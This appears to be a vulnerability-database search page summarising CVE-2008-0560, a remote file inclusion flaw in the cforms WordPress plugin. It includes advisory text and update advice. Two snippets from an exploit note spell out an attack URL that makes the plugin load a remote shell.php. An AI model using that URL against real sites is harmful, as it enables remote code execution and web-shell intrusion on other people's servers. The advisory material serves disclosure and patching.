Remote file inclusion

PHP remote file inclusion vulnerability in cforms-css.php in Oliver Seidel cforms contactforms, a Wordpress plugin, allows remote attackers to execute arbitrary PHP code via a URL in the tm parameter. NOTE: CVE disputes this issue for 7.3, since there is no tm parameter, and the code exits with a...

CVE-2008-0560

CVE-2008-0560 affects the WordPress plugin cforms (Oliver Seidel cforms, also known as contactforms). The vulnerability is in cforms-css.php and allows remote attackers to execute arbitrary PHP code via a URL parameter tm, due to a PHP remote file inclusion. Several sources note that version 7.3 ...

PT-2008-2186 · Oliver Seidel · Cforms

Name of the Vulnerable Software and Affected Versions: cforms contactforms versions prior to 7.3 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the tm parameter in the cforms-css.php file. This is a PHP remote file inclusion vulnerability in the Oliver...

WordPress Contact Form Plugin <= 7.3 - Remote File Inclusion

Because of this vulnerability in cforms-css.php, the attackers can execute arbitrary PHP code via a URL in the "tm" parameter. Solution Update the plugin...

contactforms-rfi.txt

Discovery by: Sw33t h4cK3r ----------- Exploit : http://Example.com/contactforms/cforms-css.php?tm=http://site.com/shell.php...

contactforms &quot;cforms-css.php&quot; Remote File Inclusion

Discovery by: Sw33t h4cK3r ----------- Exploit : http://Example.com/contactforms/cforms-css.php?tm=http://site.com/shell.php...